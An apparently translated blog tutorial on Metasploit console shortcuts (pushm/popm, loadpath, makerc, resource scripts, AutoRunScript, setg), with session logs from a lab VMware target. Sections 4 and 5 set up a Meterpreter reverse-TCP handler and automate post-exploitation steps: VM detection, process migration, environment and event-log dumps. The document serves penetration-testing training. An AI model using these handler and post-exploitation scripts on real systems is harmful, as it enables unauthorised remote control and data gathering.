Metasploit commands that speed up penetration testing

1. The pushm and popm commands

The pushm command pushes the current module onto the module stack;

the popm command pops the module at the top of the stack.

Note: this is not the standard stack used by a process; it is a Metasploit tool built on the same concept. The two are not the same thing.

Use case

  • When working on two different exploits at once, pushm and popm let you switch quickly between the two exploit modules.

Example

  • Use pushm to push the psexec module onto the stack, then load and use the exploit/multi/handler module.

  • After finishing with the handler, use popm to load the psexec module again from the stack.

2. The loadpath command

A Metasploit update can delete self-developed modules from the corresponding folders. To avoid that, create an external directory outside the Metasploit home directory and load modules from it.

Example

  • All modules were copied into a folder named tests on the desktop.
  • The tests folder must mirror Metasploit's directory structure exactly; the load path then becomes a virtual branch of Metasploit's directory tree.

  • The custom modules were placed in exploits/z9m8r8_test under the desktop tests folder. After loading the custom path into Metasploit, the modules under exploit/z9m8r8_test can be used:
msf5 > loadpath /root/Desktop/tests
Loaded 3 modules:
3 exploit modules
msf5 > use exploit/z9m8r8_test/
use exploit/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8
use exploit/z9m8r8_test/pcman_cwd_z9m8r8_test
use exploit/z9m8r8_test/php_utility_belt_remote_code_execution
msf5 > use exploit/z9m8r8_test/
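As an added illustration (not code from the original post), the following Python script reproduces the mapping that loadpath applies: every .rb file under a type directory (exploits, auxiliary, post, payloads, encoders, nops, evasion) becomes a reference name, and anything outside that layout is silently skipped, which is the usual reason a custom module does not show up after loadpath. The directory tree is constructed in a temporary folder with names modelled on the post's tests folder; the two misplaced files are hypothetical.

```python
import tempfile
from pathlib import Path

# Type directory under the load path -> prefix msfconsole shows in `use`.
TYPE_DIRS = {
    "exploits": "exploit", "auxiliary": "auxiliary", "post": "post",
    "payloads": "payload", "encoders": "encoder", "nops": "nop",
    "evasion": "evasion",
}

def scan_loadpath(root):
    """Return (refnames, skipped): reference names msfconsole would expose
    after `loadpath <root>`, and files outside the mirrored layout."""
    root = Path(root)
    refnames, skipped = [], []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root)
        if path.suffix != ".rb" or len(rel.parts) < 2 or rel.parts[0] not in TYPE_DIRS:
            skipped.append(rel.as_posix())
            continue
        name = "/".join(rel.parts[1:])[:-3]  # drop the ".rb" extension
        refnames.append(f"{TYPE_DIRS[rel.parts[0]]}/{name}")
    return refnames, skipped

def build_demo_tree():
    """Constructed throwaway tree modelled on the post's /root/Desktop/tests."""
    base = Path(tempfile.mkdtemp(prefix="msf_loadpath_"))
    files = [
        "exploits/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8.rb",
        "exploits/z9m8r8_test/pcman_cwd_z9m8r8_test.rb",
        "exploits/z9m8r8_test/php_utility_belt_remote_code_execution.rb",
        "exploit/wrong_dir/typo_module.rb",  # hypothetical: singular dir is not a type dir
        "exploits/z9m8r8_test/notes.txt",    # hypothetical: not a Ruby module file
    ]
    for f in files:
        p = base / f
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("# placeholder module body\n")
    return base

if __name__ == "__main__":
    loaded, skipped = scan_loadpath(build_demo_tree())
    print(f"Loaded {len(loaded)} modules:")
    for ref in loaded:
        print("  use", ref)
    for rel in skipped:
        print("  not loaded:", rel)
```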

3. The reload, edit and reload_all commands

The edit command lets you modify a Metasploit module on the fly, and the reload command reloads the edited module without closing Metasploit. If several modules were modified, the reload_all command loads all of them at once.

Example

msf5 > use exploit/z9m8r8_test/pcman_cwd_z9m8r8_test
msf5 exploit(z9m8r8_test/pcman_cwd_z9m8r8_test) > edit

Screenshots (not reproduced here): before the change; after modifying the author field; before reloading; after reloading.

4. Using resource scripts

Resource scripts remove the need to set options by hand, so option setting is automated.

There are two ways to create a resource script: write it manually, or use the makerc command.

Example (makerc command)

  • makerc saves all commands entered so far into a file; the resource command replays that file.
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.156
lhost => 10.10.10.156
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.156:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(multi/handler) > makerc
Usage: makerc <output rc file>

Save the commands executed since startup to the specified file.

msf5 exploit(multi/handler) > makerc multi_hand
[*] Saving last 6 commands to multi_hand ...
msf5 exploit(multi/handler) > back
msf5 > resource multi_hand
[*] Processing /root/multi_hand for ERB directives.
resource (/root/multi_hand)> use exploit/multi/handler
resource (/root/multi_hand)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/multi_hand)> set lhost 10.10.10.156
lhost => 10.10.10.156
resource (/root/multi_hand)> set lport 4444
lport => 4444
resource (/root/multi_hand)> exploit

[*] Started reverse TCP handler on 10.10.10.156:4444

5. Using AutoRunScript in Metasploit

Set the AutoRunScript option with set AutoRunScript [script-name]; it can also be set directly inside a resource script.

Example 1

  • Script 1: multi_script
root@kali:~# more /root/Desktop/muti_script
run post/windows/gather/checkvm
run post/windows/manage/migrate
root@kali:~#

Note: this post-exploitation script automates the checkvm module (checks whether the target runs in a virtual environment) and the migrate module (migrates the payload into a safer process).

  • Script 2: resource_complete
root@kali:~# more /root/Desktop/resource_complete
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.156
set lport 4444
set AutoRunScript multi_console_command -r /root/Desktop/muti_script
exploit
root@kali:~#

Note: AutoRunScript is set to multi_console_command with the -r option, which allows several post-exploitation commands to run from a file.

Test run:

msf5 > resource /root/Desktop/resource_complete
[*] Processing /root/Desktop/resource_complete for ERB directives.
resource (/root/Desktop/resource_complete)> use exploit/multi/handler
resource (/root/Desktop/resource_complete)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/Desktop/resource_complete)> set lhost 10.10.10.156
lhost => 10.10.10.156
resource (/root/Desktop/resource_complete)> set lport 4444
lport => 4444
resource (/root/Desktop/resource_complete)> set AutoRunScript multi_console_command -r /root/Desktop/muti_script
AutoRunScript => multi_console_command -r /root/Desktop/muti_script
resource (/root/Desktop/resource_complete)> exploit

[*] Started reverse TCP handler on 10.10.10.156:4444
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 9 opened (10.10.10.156:4444 -> 10.10.10.131:1114) at 2021-10-08 09:03:34 -0400
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 10 opened (10.10.10.156:4444 -> 10.10.10.131:1117) at 2021-10-08 09:03:49 -0400
[*] Session ID 9 (10.10.10.156:4444 -> 10.10.10.131:1114) processing AutoRunScript 'multi_console_command -r /root/Desktop/muti_script'
[*] Running Command List ...
[*] Running command run post/windows/gather/checkvm
[*] Session ID 10 (10.10.10.156:4444 -> 10.10.10.131:1117) processing AutoRunScript 'multi_console_command -r /root/Desktop/muti_script'
[*] Running Command List ...
[*] Running command run post/windows/gather/checkvm
[*] Checking if DH-CA8822AB9589 is a Virtual Machine .....
[+] This is a VMware Virtual Machine
[*] Checking if DH-CA8822AB9589 is a Virtual Machine .....
[*] Running command run post/windows/manage/migrate
[+] This is a VMware Virtual Machine
[*] Running command run post/windows/manage/migrate
[*] Running module against DH-CA8822AB9589
[*] Current server process: notepad.exe (1768)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2868
[+] Successfully migrated to process 2868
[*] Running module against DH-CA8822AB9589
[*] Current server process: AcroRd32.exe (2504)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3936
meterpreter >

Example 2

  • Use the multiscript module instead of multi_console_command to create a post-exploitation script.

Script 1: multi_script.rc

root@kali:~# more /root/Desktop/muti_script.rc
checkvm
migrate -n explorer.exe
get_env
event_manager -i
root@kali:~#

Note: this post-exploitation script automates checkvm (checks whether the target runs in a virtual environment) and migrate (migrates the payload into a safer process); the event_manager script with the -i option lists all event logs on the target system.

Script 2: resource_complete

root@kali:~# more /root/Desktop/resource_complete
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.156
set lport 4444
set AutoRunScript multiscript -r /root/Desktop/muti_script.rc
exploit
root@kali:~#

Note: the AutoRunScript argument is still -r.

Test run:

msf5 > resource /root/Desktop/resource_complete
[*] Processing /root/Desktop/resource_complete for ERB directives.
resource (/root/Desktop/resource_complete)> use exploit/multi/handler
resource (/root/Desktop/resource_complete)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/Desktop/resource_complete)> set lhost 10.10.10.156
lhost => 10.10.10.156
resource (/root/Desktop/resource_complete)> set lport 4444
lport => 4444
resource (/root/Desktop/resource_complete)> set AutoRunScript multiscript -r /root/Desktop/muti_script.rc
AutoRunScript => multiscript -r /root/Desktop/muti_script.rc
resource (/root/Desktop/resource_complete)> exploit

[*] Started reverse TCP handler on 10.10.10.156:4444
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 4 opened (10.10.10.156:4444 -> 10.10.10.131:1072) at 2021-10-08 09:37:42 -0400
[*] Session ID 4 (10.10.10.156:4444 -> 10.10.10.131:1072) processing AutoRunScript 'multiscript -r /root/Desktop/muti_script.rc'
[*] Running Multiscript script.....
[*] Running script List ...
[*] running script checkvm
[!] Meterpreter scripts are deprecated. Try post/windows/gather/checkvm.
[!] Example: run post/windows/gather/checkvm OPTION=value [...]
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] running script migrate -n explorer.exe
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: AcroRd32.exe (3744)
[+] Migrating to 1640
[+] Successfully migrated to process
[*] running script get_env
[!] Meterpreter scripts are deprecated. Try post/multi/gather/env.
[!] Example: run post/multi/gather/env OPTION=value [...]
[*] Getting all System and User Variables

Enviroment Variable list
========================

Name Value
---- -----
APPDATA C:\Documents and Settings\Administrator\Application Data
CLIENTNAME Console
ComSpec C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK NO
HOMEDRIVE C:
HOMEPATH \Documents and Settings\Administrator
HOMESHARE 仐㰈
ŗ
D
LOGONSERVER \\DH-CA8822AB9589
NUMBER_OF_PROCESSORS 1
OS Windows_NT
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE x86
PROCESSOR_IDENTIFIER x86 Family 6 Model 142 Stepping 11, GenuineIntel
PROCESSOR_LEVEL 6
PROCESSOR_REVISION 8e0b
Path C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
SESSIONNAME Console
TEMP C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
TMP C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
windir C:\WINDOWS

[*] running script event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

Name Retention Maximum Size Records
---- --------- ------------ -------
Application Disabled 524288K 480
Security Disabled 524288K 0
System Disabled 524288K 881

meterpreter > getuid
Server username: DH-CA8822AB9589\Administrator
meterpreter > getpid
Current pid: 1640
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
…………
1408 676 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1640 1620 explorer.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\Explorer.EXE
1748 1640 VMwareTray.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
…………
meterpreter >
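The deprecation notices in the run above name the post module that replaces each Meterpreter script. The following Python helper is an added example (not from the post) that rewrites a multiscript file into the run post/... form used by multi_console_command in Example 1; the mapping comes from those notices, event_manager has no replacement shown there and is flagged, and the assumption that migrate's -n argument corresponds to the migrate module's NAME option is mine.

```python
import shlex

# Deprecated Meterpreter script -> post module, taken from the deprecation
# notices printed in the run above. event_manager shows no replacement there.
SCRIPT_TO_POST = {
    "checkvm": "post/windows/gather/checkvm",
    "migrate": "post/windows/manage/migrate",
    "get_env": "post/multi/gather/env",
}

def convert_line(line):
    """Translate one multiscript entry into `run post/...`; returns (command, note)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None, None
    script, *args = shlex.split(line)
    module = SCRIPT_TO_POST.get(script)
    if module is None:
        return None, f"no post-module replacement known for '{line}'"
    opts = []
    # Assumption: migrate's -n <process> corresponds to the module's NAME option.
    if script == "migrate" and "-n" in args:
        opts.append("NAME=" + args[args.index("-n") + 1])
    elif args:
        return None, f"unhandled arguments {args} for '{script}'"
    return " ".join(["run", module] + opts), None

def convert_multiscript(text):
    """Convert a whole multiscript file; entries without a mapping become notes."""
    commands, notes = [], []
    for line in text.splitlines():
        cmd, note = convert_line(line)
        if cmd:
            commands.append(cmd)
        if note:
            notes.append(note)
    return commands, notes

# Constructed copy of the post's /root/Desktop/muti_script.rc
LEGACY_RC = """checkvm
migrate -n explorer.exe
get_env
event_manager -i
"""

if __name__ == "__main__":
    cmds, notes = convert_multiscript(LEGACY_RC)
    print("\n".join(cmds))
    print("# NOTES:", notes)
```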

6. Global variables in Metasploit

The setg command makes options such as RHOST or LHOST global, so that every module can use them.

Example

The get command shows the value of a variable; the getg command shows the value of a global variable.

Posted by z9m8r8 (54 reads, 0 comments)